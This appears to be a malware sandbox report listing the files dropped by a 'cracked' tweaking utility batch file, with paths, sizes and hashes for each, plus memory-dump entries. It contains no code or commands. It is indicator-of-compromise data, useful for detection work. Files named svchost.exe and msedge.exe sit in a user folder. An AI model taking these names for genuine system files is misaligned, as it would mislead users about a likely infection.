C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrzqpm23.nni.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\exm.zip

Filesize
13.3MB

MD5
57a6527690625bea4e4f668e7db6b2aa

SHA1
c5799fd94999d128203e81e22c6d9fdb86e167ee

SHA256
076e01b09f9c5cccc273b2f7dfa1a1efccc1a8e8ebf98a7eee756024b93bad17

SHA512
d86c7f79989eb0781e15f8631048506ffab338f933ddfedbcc2c7464447770beaf21b7ed3cba2ebb97be5ffdc9a450f2df2e2313efaeb8e8101f2ee53c066e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\nvidiaProfileInspector.zip

Filesize
145KB

MD5
93534bf1231dfd893b8c80b258217105

SHA1
4a58b5a4272f9ddaf299eb6cf5b33ecd530be98d

SHA256
9dc8f944dc55c0eca9bb939b1c756a093f8250b6d9db76319bf27ef5fbe4cb83

SHA512
f95328e49494199f3aba7a26dedc735cc32453be0038640c8df90f6fd5ae77a7539a7d3fcb62985a81c4c4ee20acf39b8e6551ffabd90dfb2ef90b5d37491e99

Download Submit
C:\Users\Admin\Downloads\EXM Premium Tweaking Utility 1.0 Cracked.bat:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\EXMPremiumTweaker.bat:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 719292.crdownload

Filesize
672KB

MD5
f9ca73d63fe61c4c401528fb470ce08e

SHA1
584f69b507ddf33985673ee612e6099aff760fb1

SHA256
16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca

SHA512
6fd03320ec84baf09a16a127c2c0ed3c265906fcb1a3b807c13001e775c396b66539238392438a8f290be04b8b8684050736331f8f99dbe8b868b44f154dd9de

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 986065.crdownload

Filesize
669KB

MD5
a907bfcab8903b37d8595377c3e268ed

SHA1
e521540a3bffd5567d83782628b3de6173cb9364

SHA256
12d8bccc8b4bf05902c0b015095db69b07dd859b577e9aa806201a082a8244ee

SHA512
bb122cd94abfe6b43b2bd86852b37212b0d6096385bad85fea47d0aa3d80ada43c8e62735db1a5561c25ad9c23a4f8681933197dcf0495e1b182061181650905

Download Submit
C:\Users\Admin\msedge.exe

Filesize
146KB

MD5
f1c2525da4f545e783535c2875962c13

SHA1
92bf515741775fac22690efc0e400f6997eba735

SHA256
9e6985fdb3bfa539f3d6d6fca9aaf18356c28a00604c4f961562c34fa9f11d0f

SHA512
56308ac106caa84798925661406a25047df8d90e4b65b587b261010293587938fa922fbb2cfdedfe71139e16bfcf38e54bb31cbcc00cd244db15d756459b6133

Download Submit
C:\Users\Admin\svchost.exe

Filesize
226KB

MD5
1bea6c3f126cf5446f134d0926705cee

SHA1
02c49933d0c2cc068402a93578d4768745490d58

SHA256
1d69b5b87c4cd1251c5c94461a455659febb683eab0ebd97dd30da2319ffc638

SHA512
eb9f423f6adb5e686a53f5f197e6b08455f8048d965a9ec850838fdf4724ef87f68945c435ace5a48a9a7226006a348e97586335d0246ea0dc898a412dea5df3

Download Submit
C:\exm\NvidiaProfileInspector\Reference.xml

Filesize
213KB

MD5
1a8493bff2d17c83e299101954dcb562

SHA1
439258f42f755d40311a31b37f6d37f447d546ba

SHA256
5a31c0500500713efd83160cef3db3f56b807b7c4f7a8b4ee7f4ffe05c676081

SHA512
75f2383f73fd3e03fdd17e93091cca7192919cb76ff564cafa7ee8d33d50db83d94dd3905d06b67c01f52f580b73573b490beb61f9a58af3cad3c0a29ce0aa2f

Download Submit
C:\exm\NvidiaProfileInspector\nvidiaProfileInspector.exe

Filesize
535KB

MD5
ff5f39370b67a274cb58ba7e2039d2e2

SHA1
3020bb33e563e9efe59ea22aa4588bed5f1b2897

SHA256
1233487ea4db928ee062f12b00a6eda01445d001ab55566107234dea4dc65872

SHA512
7decec37c80d1d5ad6296d737d5d16c4fc92353a3ae4bd083c4a7b267bb6073a53d9f6152b20f9b5e62ba6c93f76d08f813812a83ce164db4c91107d7ad5a95f

Download Submit
C:\exm\NvidiaProfileInspector\nvidiaProfileInspector.exe.config

Filesize
158B

MD5
ce6d0bc7328b0fab08de80f292c1eaa4

SHA1
ae505d6f60a71259b91865f6d5a3d674e9de0ebe

SHA256
383b8dcb968b6bd0633658d9bb55c4acaf4c85a075aa456904a42d4e4efd5561

SHA512
f009ad44131f19997c7c7be38144132d9f701fda4492f3782a2717b92859f189196fac5a7d7e6ff6952f2c1735f27ffaddf0f7acbb45b98a7d85572e96c16c00

Download Submit
memory/240-1192-0x00000000004F0000-0x000000000051A000-memory.dmp

Filesize
168KB

Download
memory/404-1197-0x0000000000540000-0x000000000057E000-memory.dmp

Filesize
248KB

Download
memory/404-1198-0x0000000005600000-0x0000000005666000-memory.dmp

Filesize
408KB

Download
memory/1936-1136-0x0000000000600000-0x0000000000666000-memory.dmp

Filesize
408KB

Download
memory/2900-994-0x000001FBF93C0000-0x000001FBF93D2000-memory.dmp

Filesize
72KB

Download
memory/2900-995-0x000001FBF93A0000-0x000001FBF93AA000-memory.dmp

Filesize
40KB

Download
memory/5052-945-0x000001E5A1F30000-0x000001E5A1F52000-memory.dmp

Filesize
136KB

Download